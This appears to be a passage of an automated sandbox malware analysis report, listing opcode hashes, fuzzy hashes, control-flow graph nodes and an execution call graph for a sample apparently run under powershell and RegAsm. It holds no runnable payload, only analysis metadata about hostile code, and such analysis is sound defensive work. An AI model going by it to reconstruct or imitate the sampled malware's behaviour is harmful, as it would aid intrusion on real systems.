                          • Opcode ID: a664c224e898c2e08aeb252d12a887d9a34065caefba8a98b4ac455d98f28553
                          • Instruction ID: 15c8ff3ee5e9ed2eca9ee98975b29bb82a5262db5c7fef86984698b693cc23d8
                          • Opcode Fuzzy Hash: a664c224e898c2e08aeb252d12a887d9a34065caefba8a98b4ac455d98f28553
                          • Instruction Fuzzy Hash: 4331F83190D7894FDB5ADBB888566E9BFE0EF57320F0442ABD089C7193DA785405CB51

                          Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000000.00000002.2237902686.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ffd34730000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8e6e447a493f0ab919f7fb719616b89cc8c4810b4cc4898320df264e03c42549
                          • Instruction ID: 72cae008eebda4bf20062e7ea1ef6b1a4c5495d21390af8e6c7dd9b7fafa8880
                          • Opcode Fuzzy Hash: 8e6e447a493f0ab919f7fb719616b89cc8c4810b4cc4898320df264e03c42549
                          • Instruction Fuzzy Hash: 928146A2F0DA8A4FE7B6966808B51757BD1EF56210B2C41BAD14DC72D3DD0CBC0593C1

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 140 7ffd34730548-7ffd34730552 141 7ffd34730554-7ffd3473055a 140->141 142 7ffd34730588-7ffd3473058f 140->142 144 7ffd34730590-7ffd34730594 141->144 145 7ffd3473055c-7ffd34730584 141->145 142->144 149 7ffd347305b0-7ffd347305bd 144->149 150 7ffd34730596-7ffd347305ae 144->150 145->142 148 7ffd3473068d-7ffd347306e7 145->148 165 7ffd34730712-7ffd34730739 148->165 166 7ffd347306e9-7ffd34730700 148->166 154 7ffd347305bf-7ffd347305c2 149->154 155 7ffd34730631-7ffd3473063b 149->155 150->149 154->155 158 7ffd347305c4-7ffd347305cc 154->158 159 7ffd3473063d-7ffd34730649 155->159 160 7ffd3473064a-7ffd3473068a 155->160 158->148 162 7ffd347305d2-7ffd347305dc 158->162 160->148 167 7ffd347305de-7ffd347305f3 162->167 168 7ffd347305f5-7ffd347305f9 162->168 181 7ffd3473073b 165->181 182 7ffd3473073c-7ffd3473074d 165->182 167->168 168->155 172 7ffd347305fb 168->172 177 7ffd34730601-7ffd3473060a 172->177 179 7ffd34730623-7ffd34730630 177->179 180 7ffd3473060c-7ffd34730619 177->180 180->179 186 7ffd3473061b-7ffd34730621 180->186 181->182 184 7ffd3473074f 182->184 185 7ffd34730750-7ffd34730764 182->185 184->185 186->179
                          Memory Dump Source
                          • Source File: 00000000.00000002.2237902686.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ffd34730000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d2816ad3f9e2eafac5ecd5c9b5597771ac9b3d879708e48baaecbcf5855bf4e3
                          • Instruction ID: 570dbe56c4542ddd16bbff063fe7f91a64877a8d47b93eb7b134280d72bfcc75
                          • Opcode Fuzzy Hash: d2816ad3f9e2eafac5ecd5c9b5597771ac9b3d879708e48baaecbcf5855bf4e3
                          • Instruction Fuzzy Hash: C0712772B0DAC98FEB959A6C48B85B57BE0EF96210B2800BBD18DD7197DD19BC05C3C1

                          Control-flow Graph

                          Memory Dump Source
                          • Source File: 00000000.00000002.2237902686.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ffd34730000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 52196eef5c712c63bcac0c165d1c035748870e4a689c07d87865ca67648da8d7
                          • Instruction ID: 4d13d35f957ae12d13f8d1861583b6e1f227ba23e355d361d0b912fb80ed087a
                          • Opcode Fuzzy Hash: 52196eef5c712c63bcac0c165d1c035748870e4a689c07d87865ca67648da8d7
                          • Instruction Fuzzy Hash: 5A41E393F0EA874BF7B6966804B5178B7C1EF9225076C41BAD24EC72E3DD0DB80162C1
                          Memory Dump Source
                          • Source File: 00000000.00000002.2237902686.00007FFD34730000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34730000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ffd34730000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7107b1dd97a5e640d14bf767a4f9cff85271385442af0f7d1fdeb91fa9d6dcd6
                          • Instruction ID: c64e99d08b5c37284c4eaba4e7360d6acab0704a7d8db06411e0c4af94a3345d
                          • Opcode Fuzzy Hash: 7107b1dd97a5e640d14bf767a4f9cff85271385442af0f7d1fdeb91fa9d6dcd6
                          • Instruction Fuzzy Hash: B9F02453F4DA599FFBB0A16C24B92F46281DF66520B1801B6D54EC3382EC086C1103C0

                          Execution Graph

                          Execution Coverage:17.6%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:0%
                          Total number of Nodes:557
                          Total number of Limit Nodes:42
                          execution_graph 48945 5a10b40 48946 5a10b66 48945->48946 48949 5a10c00 48946->48949 48950 5a10c26 48949->48950 48954 5a10ce0 48950->48954 48958 5a10cf0 48950->48958 48951 5a10bf4 48955 5a10cf0 48954->48955 48962 5a10df1 48955->48962 48959 5a10d02 48958->48959 48961 5a10df1 6 API calls 48959->48961 48960 5a10d82 48960->48951 48961->48960 48963 5a11381 6 API calls 48962->48963 48964 5a10d82 48963->48964 48964->48951 49224 56c5a2d 49225 56c5a38 49224->49225 49226 5a15b48 2 API calls 49224->49226 49227 5a15b58 2 API calls 49224->49227 49226->49225 49227->49225 48967 13fd01c 48968 13fd034 48967->48968 48969 13fd08e 48968->48969 48976 56c702c 48968->48976 48985 56c8ab0 48968->48985 48994 56c7d99 48968->48994 48998 56c8b08 48968->48998 49007 56c7da8 48968->49007 49011 5a12990 48968->49011 48977 56c7037 48976->48977 48978 56c8b79 48977->48978 48980 56c8b69 48977->48980 48981 56c8b77 48978->48981 49031 56c7154 48978->49031 49015 56c8d6c 48980->49015 49021 56c8c90 48980->49021 49026 56c8ca0 48980->49026 48986 56c8abf 48985->48986 48987 56c8b79 48986->48987 48989 56c8b69 48986->48989 48988 56c7154 2 API calls 48987->48988 48990 56c8b77 48987->48990 48988->48990 48991 56c8d6c 2 API calls 48989->48991 48992 56c8ca0 2 API calls 48989->48992 48993 56c8c90 2 API calls 48989->48993 48991->48990 48992->48990 48993->48990 48995 56c7da8 48994->48995 48996 56c702c 2 API calls 48995->48996 48997 56c7def 48996->48997 48997->48969 48999 56c8b45 48998->48999 49000 56c8b79 48999->49000 49002 56c8b69 48999->49002 49001 56c7154 2 API calls 49000->49001 49003 56c8b77 49000->49003 49001->49003 49004 56c8d6c 2 API calls 49002->49004 49005 56c8ca0 2 API calls 49002->49005 49006 56c8c90 2 API calls 49002->49006 49004->49003 49005->49003 49006->49003 49008 56c7dce 49007->49008 49009 56c702c 2 API calls 49008->49009 49010 56c7def 49009->49010 49010->48969 49013 56c7154 2 API calls 49011->49013 49014 56ca1b0 2 API calls 49011->49014 49012 5a129c5 49012->48969 49013->49012 49014->49012 49016 56c8d2a 49015->49016 49017 56c8d7a 49015->49017 49038 56c8d48 49016->49038 49046 56c8d58 49016->49046 49018 56c8d40 49018->48981 49023 56c8cb4 49021->49023 49022 56c8d40 49022->48981 49024 56c8d48 2 API calls 49023->49024 49025 56c8d58 2 API calls 49023->49025 49024->49022 49025->49022 49027 56c8cb4 49026->49027 49029 56c8d48 2 API calls 49027->49029 49030 56c8d58 2 API calls 49027->49030 49028 56c8d40 49028->48981 49029->49028 49030->49028 49032 56c715f 49031->49032 49033 56ca2ac 49032->49033 49034 56ca202 49032->49034 49036 56c702c CallWindowProcW 49033->49036 49035 56ca25a CallWindowProcW 49034->49035 49037 56ca209 49034->49037 49035->49037 49036->49037 49037->48981 49039 56c8d58 49038->49039 49040 56c8d69 49039->49040 49053 5a10040 49039->49053 49071 56ca192 49039->49071 49074 5a14d58 49039->49074 49079 5a10006 49039->49079 49097 5a14d47 49039->49097 49040->49018 49047 56c8d69 49046->49047 49048 5a10040 2 API calls 49046->49048 49049 5a14d47 2 API calls 49046->49049 49050 5a10006 2 API calls 49046->49050 49051 5a14d58 2 API calls 49046->49051 49052 56ca192 2 API calls 49046->49052 49047->49018 49048->49047 49049->49047 49050->49047 49051->49047 49052->49047 49054 5a10059 49053->49054 49061 5a1006c 49053->49061 49055 5a100a0 49054->49055 49056 5a1005e 49054->49056 49060 5a1032c 49055->49060 49055->49061 49057 5a10063 49056->49057 49058 5a1007a 49056->49058 49059 5a1028a 49057->49059 49057->49061 49058->49061 49062 5a102f4 49058->49062 49063 5a101a6 49058->49063 49102 5a10808 49059->49102 49107 5a10818 49059->49107 49118 5a117b8 49060->49118 49122 5a117a8 49060->49122 49061->49063 49126 5a10610 49061->49126 49110 5a15b18 49062->49110 49114 5a15b0b 49062->49114 49063->49040 49072 56c7154 2 API calls 49071->49072 49073 56ca1aa 49072->49073 49073->49040 49075 5a14d66 49074->49075 49076 5a14d98 49074->49076 49077 5a14d6d 49075->49077 49177 5a14db3 49075->49177 49076->49040 49077->49040 49080 5a1001b 49079->49080 49081 5a100a0 49080->49081 49082 5a1005e 49080->49082 49087 5a1006c 49080->49087 49086 5a1032c 49081->49086 49081->49087 49083 5a10063 49082->49083 49084 5a1007a 49082->49084 49085 5a1028a 49083->49085 49083->49087 49084->49087 49088 5a102f4 49084->49088 49089 5a101a6 49084->49089 49090 5a10808 2 API calls 49085->49090 49091 5a10818 2 API calls 49085->49091 49095 5a117a8 2 API calls 49086->49095 49096 5a117b8 2 API calls 49086->49096 49087->49089 49092 5a10610 2 API calls 49087->49092 49093 5a15b18 2 API calls 49088->49093 49094 5a15b0b 2 API calls 49088->49094 49089->49040 49090->49089 49091->49089 49092->49089 49093->49089 49094->49089 49095->49089 49096->49089 49098 5a14d66 49097->49098 49099 5a14d98 49097->49099 49100 5a14d6d 49098->49100 49101 5a14db3 2 API calls 49098->49101 49099->49040 49100->49040 49101->49100 49103 5a10812 49102->49103 49104 5a107f7 49102->49104 49105 5a10610 2 API calls 49103->49105 49104->49063 49106 5a10826 49105->49106 49106->49063 49108 5a10610 2 API calls 49107->49108 49109 5a10826 49108->49109 49109->49063 49111 5a15b3b 49110->49111 49112 5a10610 2 API calls 49111->49112 49113 5a15b44 49112->49113 49113->49063 49115 5a15b3b 49114->49115 49116 5a10610 2 API calls 49115->49116 49117 5a15b44 49116->49117 49117->49063 49121 5a117c8 49118->49121 49119 5a10610 2 API calls 49120 5a117d1 49119->49120 49120->49063 49121->49119 49123 5a117b8 49122->49123 49124 5a10610 2 API calls 49123->49124 49125 5a117d1 49124->49125 49125->49063 49127 5a10622 49126->49127 49128 5a1061b 49126->49128 49132 5a10630 49127->49132 49138 5a10640 49127->49138 49128->49063 49129 5a10628 49129->49063 49133 5a10640 49132->49133 49137 5a1065c 49133->49137 49145 56c9588 49133->49145 49150 56ca071 49133->49150 49155 56c957a 49133->49155 49137->49129 49139 5a1064e 49138->49139 49141 5a10670 49138->49141 49140 5a1065c 49139->49140 49142 56c957a 2 API calls 49139->49142 49143 56ca071 2 API calls 49139->49143 49144 56c9588 2 API calls 49139->49144 49140->49129 49141->49129 49142->49140 49143->49140 49144->49140 49147 56c9589 49145->49147 49146 56c9625 49146->49137 49147->49146 49160 5a106a0 49147->49160 49165 5a106b0 49147->49165 49152 56c9ff6 49150->49152 49151 56ca046 49151->49137 49152->49151 49153 5a106a0 2 API calls 49152->49153 49154 5a106b0 2 API calls 49152->49154 49153->49151 49154->49151 49157 56c9588 49155->49157 49156 56c9625 49156->49137 49157->49156 49158 5a106a0 2 API calls 49157->49158 49159 5a106b0 2 API calls 49157->49159 49158->49156 49159->49156 49161 5a106b0 49160->49161 49162 5a10719 49161->49162 49163 56c7154 2 API calls 49161->49163 49170 56ca1b0 49161->49170 49162->49146 49163->49162 49166 5a106f6 49165->49166 49167 5a10719 49166->49167 49168 56c7154 2 API calls 49166->49168 49169 56ca1b0 2 API calls 49166->49169 49167->49146 49168->49167 49169->49167 49171 56ca1c0 49170->49171 49172 56ca2ac 49171->49172 49173 56ca202 49171->49173 49175 56c702c CallWindowProcW 49172->49175 49174 56ca25a CallWindowProcW 49173->49174 49176 56ca209 49173->49176 49174->49176 49175->49176 49176->49162 49178 5a14e1b 49177->49178 49179 5a14de6 49177->49179 49178->49179 49180 56c9588 2 API calls 49178->49180 49181 56c957a 2 API calls 49178->49181 49182 56ca192 2 API calls 49178->49182 49179->49077 49180->49179 49181->49179 49182->49179 48858 56ca328 48859 56ca338 48858->48859 48867 56cbc14 48859->48867 48873 56cb944 48859->48873 48885 56cb968 48859->48885 48897 5a11381 48859->48897 48901 5a112d8 48859->48901 48905 5a112e8 48859->48905 48860 56ca361 48868 56cbc1d 48867->48868 48870 56cbc3b 48867->48870 48869 56ca4a0 6 API calls 48868->48869 48868->48870 48869->48870 48871 56ca4a0 6 API calls 48870->48871 48872 56cbd74 48870->48872 48871->48872 48872->48860 48877 56cb994 48873->48877 48875 56ca4a0 6 API calls 48876 56cbd74 48875->48876 48876->48860 48884 56cbbcc 48877->48884 48909 56cb564 48877->48909 48878 56cba4d 48879 56ca4a0 6 API calls 48878->48879 48883 56cbaf5 48878->48883 48880 56cbabf 48879->48880 48881 56ca4a0 6 API calls 48880->48881 48881->48883 48882 56ca4a0 6 API calls 48882->48884 48883->48882 48884->48875 48884->48876 48889 56cb994 48885->48889 48886 56cb564 6 API calls 48890 56cba4d 48886->48890 48887 56ca4a0 6 API calls 48888 56cbd74 48887->48888 48888->48860 48889->48886 48896 56cbbcc 48889->48896 48891 56ca4a0 6 API calls 48890->48891 48895 56cbaf5 48890->48895 48892 56cbabf 48891->48892 48893 56ca4a0 6 API calls 48892->48893 48893->48895 48894 56ca4a0 6 API calls 48894->48896 48895->48894 48896->48887 48896->48888 48898 5a1131e 48897->48898 48900 56cbc14 6 API calls 48898->48900 48899 5a11372 48899->48860 48900->48899 48902 5a1131d 48901->48902 48904 56cbc14 6 API calls 48902->48904 48903 5a11372 48903->48860 48904->48903 48906 5a1131d 48905->48906 48908 56cbc14 6 API calls 48906->48908 48907 5a11372 48907->48860 48908->48907 48912 56cb56f 48909->48912 48910 56cbec9 48911 56ca4a0 6 API calls 48910->48911 48914 56cbf07 48910->48914 48911->48910 48912->48910 48913 56ca4a0 6 API calls 48912->48913 48912->48914 48913->48910 48914->48878 48928 56cd1c8 48931 56cc6c8 48928->48931 48930 56cd1de 48932 56cc6d3 48931->48932 48933 56cd298 48932->48933 48937 56cd2a8 48932->48937 48941 56cd2b8 48932->48941 48933->48930 48938 56cd2b8 48937->48938 48939 56ca4a0 6 API calls 48938->48939 48940 56cd36e 48938->48940 48939->48940 48942 56cd2e7 48941->48942 48943 56ca4a0 6 API calls 48942->48943 48944 56cd36e 48942->48944 48943->48944 48965 56c3668 DuplicateHandle 48966 56c36fe 48965->48966 49183 5a1ac85 49184 5a1aca5 49183->49184 49189 5a1fb58 49184->49189 49194 5a1faae 49184->49194 49200 5a1fb4b 49184->49200 49185 5a1acda 49190 5a1fb59 49189->49190 49206 5a1fba8 49190->49206 49210 5a1fb98 49190->49210 49191 5a1fb88 49191->49185 49195 5a1fb59 49194->49195 49196 5a1fada 49194->49196 49198 5a1fba8 6 API calls 49195->49198 49199 5a1fb98 6 API calls 49195->49199 49196->49185 49197 5a1fb88 49197->49185 49198->49197 49199->49197 49201 5a1faf5 49200->49201 49202 5a1fb53 49200->49202 49201->49185 49204 5a1fba8 6 API calls 49202->49204 49205 5a1fb98 6 API calls 49202->49205 49203 5a1fb88 49203->49185 49204->49203 49205->49203 49208 5a1fbcf 49206->49208 49207 5a1fc2e 49207->49191 49208->49207 49214 5a1feb3 49208->49214 49211 5a1fba6 49210->49211 49212 5a1fc2e 49211->49212 49213 5a1feb3 6 API calls 49211->49213 49212->49191 49213->49211 49215 5a1feda 49214->49215 49216 5a1feed 49215->49216 49217 58cfe77 6 API calls 49215->49217 49218 58cfb80 6 API calls 49215->49218 49219 58cfb90 6 API calls 49215->49219 49216->49208 49217->49216 49218->49216 49219->49216 48915 5a157e8 48916 5a1580f 48915->48916 48917 5a15870 48916->48917 48918 56c325c 6 API calls 48916->48918 48920 56c5858 48916->48920 48918->48917 48921 56c5868 48920->48921 48922 56c4038 6 API calls 48921->48922 48923 56c588f 48922->48923 48923->48917 49267 56cfae7 49268 56cfb0f 49267->49268 49269 56cc6c8 6 API calls 49267->49269 49269->49268 49228 56c3420 49229 56c3466 GetCurrentProcess 49228->49229 49231 56c34b8 GetCurrentThread 49229->49231 49232 56c34b1 49229->49232 49233 56c34ee 49231->49233 49234 56c34f5 GetCurrentProcess 49231->49234 49232->49231 49233->49234 49237 56c352b 49234->49237 49235 56c3553 GetCurrentThreadId 49236 56c3584 49235->49236 49237->49235 49220 5a14c90 49221 5a14cd5 GetClassInfoW 49220->49221 49223 5a14d1b 49221->49223 49238 56c7e38 SetWindowLongW 49239 56c7ea4 49238->49239 48854 5a11398 48855 5a113e0 SetWindowTextW 48854->48855 48856 5a113da 48854->48856 48857 5a11411 48855->48857 48856->48855 49240 5a116f8 49241 5a11712 49240->49241 49243 5a106a0 2 API calls 49241->49243 49244 5a106b0 2 API calls 49241->49244 49242 5a1179c 49243->49242 49244->49242 48924 56c7bf0 48925 56c7c58 CreateWindowExW 48924->48925 48927 56c7d14 48925->48927 49245 56c3c10 49246 56c3c38 49245->49246 49248 56c3c60 49246->49248 49249 56c323c 49246->49249 49250 56c3247 49249->49250 49257 56c4118 7 API calls 49250->49257 49258 56c4354 6 API calls 49250->49258 49259 56c4150 7 API calls 49250->49259 49251 56c3cde 49262 56c324c 49251->49262 49253 56c3cf8 49254 56c325c 6 API calls 49253->49254 49255 56c3cff 49254->49255 49260 56c5a48 6 API calls 49255->49260 49261 56c5a60 6 API calls 49255->49261 49256 56c3d09 49256->49248 49257->49251 49258->49251 49259->49251 49260->49256 49261->49256 49265 56c3257 49262->49265 49263 56c3f44 6 API calls 49264 56c527c 49263->49264 49264->49253 49265->49263 49266 56c5281 49265->49266 49266->49253 49270 56c1090 49271 56c1091 49270->49271 49275 56c1178 49271->49275 49280 56c1188 49271->49280 49272 56c109f 49277 56c1188 49275->49277 49276 56c11bc 49276->49272 49277->49276 49278 56c13c0 GetModuleHandleW 49277->49278 49279 56c13ed 49278->49279 49279->49272 49282 56c1189 49280->49282 49281 56c11bc 49281->49272 49282->49281 49283 56c13c0 GetModuleHandleW 49282->49283 49284 56c13ed 49283->49284 49284->49272 48617 145a758 48618 145a774 48617->48618 48619 145a7e5 48618->48619 48623 145a978 48618->48623 48628 58cedd8 48618->48628 48632 58cede8 48618->48632 48624 145a99d 48623->48624 48636 145ae80 48624->48636 48640 145ae90 48624->48640 48629 58cedfa 48628->48629 48648 58ce9d4 48629->48648 48633 58cedfa 48632->48633 48634 58ce9d4 8 API calls 48633->48634 48635 58cee1a 48634->48635 48635->48618 48638 145aeb7 48636->48638 48637 145af94 48638->48637 48644 145a724 48638->48644 48642 145aeb7 48640->48642 48641 145af94 48641->48641 48642->48641 48643 145a724 CreateActCtxA 48642->48643 48643->48641 48645 145bf20 CreateActCtxA 48644->48645 48647 145bfe3 48645->48647 48650 58ce9df 48648->48650 48652 58cea14 48650->48652 48651 58cef2c 48651->48651 48654 58cea1f 48652->48654 48653 58cec5c 8 API calls 48657 58cf199 48653->48657 48656 58cf03e 48654->48656 48654->48657 48658 58cec5c 48654->48658 48656->48653 48656->48657 48657->48651 48659 58cec67 48658->48659 48663 58cf3e8 48659->48663 48673 58cf3d7 48659->48673 48660 58cf3d4 48660->48656 48666 58cf40e 48663->48666 48664 58cf422 48664->48660 48665 58cf4ff 48683 56c4150 48665->48683 48694 56c4354 48665->48694 48699 56c4118 48665->48699 48666->48664 48666->48665 48668 58cf562 48666->48668 48667 58cf50d 48667->48660 48668->48667 48710 58c9508 48668->48710 48674 58cf40e 48673->48674 48675 58cf422 48674->48675 48676 58cf4ff 48674->48676 48678 58cf562 48674->48678 48675->48660 48680 56c4118 7 API calls 48676->48680 48681 56c4354 6 API calls 48676->48681 48682 56c4150 7 API calls 48676->48682 48677 58cf50d 48677->48660 48678->48677 48679 58c9508 2 API calls 48678->48679 48679->48677 48680->48677 48681->48677 48682->48677 48684 56c4151 48683->48684 48685 56c424f 48684->48685 48689 56c445a 48684->48689 48690 56c42bb 48684->48690 48718 56ca4a0 48684->48718 48685->48690 48732 56c325c 48685->48732 48687 56c41f6 48688 56c424a KiUserCallbackDispatcher 48687->48688 48688->48685 48689->48689 48690->48689 48724 5a14880 48690->48724 48728 5a14890 48690->48728 48695 56c4371 48694->48695 48696 56c445a 48695->48696 48697 5a14880 6 API calls 48695->48697 48698 5a14890 6 API calls 48695->48698 48696->48696 48697->48696 48698->48696 48700 56c411d 48699->48700 48701 56c424f 48700->48701 48702 56c42bb 48700->48702 48706 56c445a 48700->48706 48709 56ca4a0 6 API calls 48700->48709 48701->48702 48703 56c325c 6 API calls 48701->48703 48702->48706 48707 5a14880 6 API calls 48702->48707 48708 5a14890 6 API calls 48702->48708 48703->48702 48704 56c41f6 48705 56c424a KiUserCallbackDispatcher 48704->48705 48705->48701 48706->48706 48707->48706 48708->48706 48709->48704 48711 58c9513 48710->48711 48713 58ca0a6 48711->48713 48839 5a129e0 48711->48839 48844 5a129d0 48711->48844 48712 58ca147 48716 5a129e0 2 API calls 48712->48716 48717 5a129d0 2 API calls 48712->48717 48713->48667 48716->48713 48717->48713 48719 56ca4b0 48718->48719 48720 56ca4ed 48719->48720 48736 58cfe77 48719->48736 48741 58cfb90 48719->48741 48754 58cfb80 48719->48754 48720->48687 48725 5a148ba 48724->48725 48796 5a14b79 48725->48796 48726 5a148dd 48726->48689 48729 5a148ba 48728->48729 48731 5a14b79 6 API calls 48729->48731 48730 5a148dd 48730->48689 48731->48730 48733 56c3267 48732->48733 48809 56c4038 48733->48809 48735 56c588f 48735->48690 48737 58cfe25 48736->48737 48738 58cfe83 48736->48738 48737->48736 48767 56c3f44 48737->48767 48771 56c5310 48737->48771 48738->48720 48742 58cfbc9 48741->48742 48744 58cfc67 48742->48744 48775 56c5a48 48742->48775 48779 56c5a60 48742->48779 48743 58c9508 2 API calls 48746 58cfcdd 48743->48746 48744->48743 48745 58cfdfd 48747 58cfe83 48745->48747 48748 56c3f44 6 API calls 48745->48748 48749 56c5310 6 API calls 48745->48749 48746->48745 48784 5a141bb 48746->48784 48789 5a141c8 48746->48789 48747->48720 48748->48745 48749->48745 48755 58cfbc9 48754->48755 48757 58cfc67 48755->48757 48761 56c5a48 6 API calls 48755->48761 48762 56c5a60 6 API calls 48755->48762 48756 58c9508 2 API calls 48759 58cfcdd 48756->48759 48757->48756 48758 58cfdfd 48760 58cfe83 48758->48760 48763 56c3f44 6 API calls 48758->48763 48764 56c5310 6 API calls 48758->48764 48759->48758 48765 5a141c8 SendMessageW 48759->48765 48766 5a141bb SendMessageW 48759->48766 48760->48720 48761->48757 48762->48757 48763->48758 48764->48758 48765->48758 48766->48758 48768 56c3f4f 48767->48768 48769 56c325c 6 API calls 48768->48769 48770 56c53b5 48768->48770 48769->48770 48770->48737 48772 56c5320 48771->48772 48773 56c325c 6 API calls 48772->48773 48774 56c53b5 48772->48774 48773->48774 48774->48737 48776 56c5a60 48775->48776 48778 56c5a9d 48776->48778 48794 56c4068 6 API calls 48776->48794 48778->48744 48781 56c5b9e 48779->48781 48782 56c5a91 48779->48782 48780 56c5a9d 48780->48744 48781->48744 48782->48780 48795 56c4068 6 API calls 48782->48795 48785 5a141d6 48784->48785 48786 5a141da SendMessageW 48784->48786 48785->48745 48788 5a1428c 48786->48788 48788->48745 48790 5a141d6 48789->48790 48791 5a141da SendMessageW 48789->48791 48790->48745 48793 5a1428c 48791->48793 48793->48745 48794->48778 48795->48781 48797 5a14b9c 48796->48797 48801 56c4dd8 48797->48801 48805 56c4de8 48797->48805 48798 5a14bcc 48798->48726 48802 56c4de8 48801->48802 48803 56c325c 6 API calls 48802->48803 48804 56c4e49 48802->48804 48803->48804 48804->48798 48806 56c4de9 48805->48806 48807 56c325c 6 API calls 48806->48807 48808 56c4e49 48806->48808 48807->48808 48808->48798 48811 56c4043 48809->48811 48810 56c5a38 48810->48735 48811->48810 48814 56c5962 48811->48814 48815 56c5a48 6 API calls 48811->48815 48816 56c5a60 6 API calls 48811->48816 48812 56c5a01 48819 5a15b48 48812->48819 48824 5a15b58 48812->48824 48813 56c4038 6 API calls 48813->48814 48814->48812 48814->48813 48815->48814 48816->48814 48820 5a15b6a 48819->48820 48821 5a15ba7 48820->48821 48829 5a15d51 48820->48829 48834 5a15d60 48820->48834 48821->48810 48826 5a15b6a 48824->48826 48825 5a15ba7 48825->48810 48826->48825 48827 5a15d51 2 API calls 48826->48827 48828 5a15d60 2 API calls 48826->48828 48827->48825 48828->48825 48830 5a15d83 48829->48830 48831 5a15eb8 48830->48831 48832 5a164e9 GetConsoleWindow GetConsoleWindow 48830->48832 48833 5a164f8 GetConsoleWindow GetConsoleWindow 48830->48833 48831->48821 48832->48831 48833->48831 48835 5a15d83 48834->48835 48836 5a15eb8 48835->48836 48837 5a164e9 GetConsoleWindow GetConsoleWindow 48835->48837 48838 5a164f8 GetConsoleWindow GetConsoleWindow 48835->48838 48836->48821 48837->48836 48838->48836 48840 5a129f0 48839->48840 48849 5a12a11 48840->48849 48852 5a12a18 PostMessageW 48840->48852 48841 5a12a01 48841->48712 48845 5a129e0 48844->48845 48847 5a12a11 PostMessageW 48845->48847 48848 5a12a18 PostMessageW 48845->48848 48846 5a12a01 48846->48712 48847->48846 48848->48846 48850 5a12a18 PostMessageW 48849->48850 48851 5a12a84 48850->48851 48851->48841 48853 5a12a84 48852->48853 48853->48841
                          Strings
                          Memory Dump Source
                          • Source File: 00000003.00000002.2215899520.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1450000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID: 2
                          • API String ID: 0-450215437
                          • Opcode ID: 91eb8929a7bec6b5d40d384dfb6006a50a85c3bb257e9c0b137b334005f615dc
                          • Instruction ID: ab8e51c24f7f6b93899d685f9e349ea4ee6daac003963d3d6d4a3eb1668ff1ab
                          • Opcode Fuzzy Hash: 91eb8929a7bec6b5d40d384dfb6006a50a85c3bb257e9c0b137b334005f615dc
                          • Instruction Fuzzy Hash: 4EC2A474A01229CFDB65CF69C984B9DBBF5BB89304F1081EAD909AB355DB309E85CF40
                          Memory Dump Source
                          • Source File: 00000003.00000002.2215899520.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1450000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 147ed60aa078429f51b4bd91b8fe716d8be095f6c77a3fae0943b00816209332
                          • Instruction ID: a89aa5c2be4ba5fe333aaec7b57ea1972ab8ecc07bcf5fc9276b0f194dd29d0b
                          • Opcode Fuzzy Hash: 147ed60aa078429f51b4bd91b8fe716d8be095f6c77a3fae0943b00816209332
                          • Instruction Fuzzy Hash: AEA29475E00228DFDB65CF69C984B99BBB2FF89304F1481E9D509AB265DB319E81CF40
                          Memory Dump Source
                          • Source File: 00000003.00000002.2226261950.0000000005A10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A10000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a10000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 46de1b1bac4731534617d1e9f10b8bd1607c672ad4a1bb3a8b0f6827f1ab99b5
                          • Instruction ID: 396823e94ed00cf8d106479e888fc54a74c4d25320dfbb3ce7d976483aa14abe
                          • Opcode Fuzzy Hash: 46de1b1bac4731534617d1e9f10b8bd1607c672ad4a1bb3a8b0f6827f1ab99b5
                          • Instruction Fuzzy Hash: F8424070E042188FDF54EFA9C854BAEBBF2BF84300F14856AD80AAB385DB349D45CB55
                          Memory Dump Source
                          • Source File: 00000003.00000002.2215899520.0000000001450000.00000040.00000800.00020000.00000000.sdmp, Offset: 01450000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1450000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1fdaa77c5e4ab497c257b1fc2047d8b4b729a68658854238f6e22f30bdd79980
                          • Instruction ID: bb19561a3c4003723f1cbd11aa7529c638183223b561c796a3f620d4696e40bf
                          • Opcode Fuzzy Hash: 1fdaa77c5e4ab497c257b1fc2047d8b4b729a68658854238f6e22f30bdd79980
                          • Instruction Fuzzy Hash: A9329374A00229CFCB65DF28C984BA9BBB5FB49310F1581E9D90DAB355DB30AE81CF54
                          Memory Dump Source
                          • Source File: 00000003.00000002.2226583608.0000000005A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5a70000_RegAsm.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 272fbb45e06eddc68ad9d3f6631489228f8d1777543bf3c87cc8094e0fb3d6c8
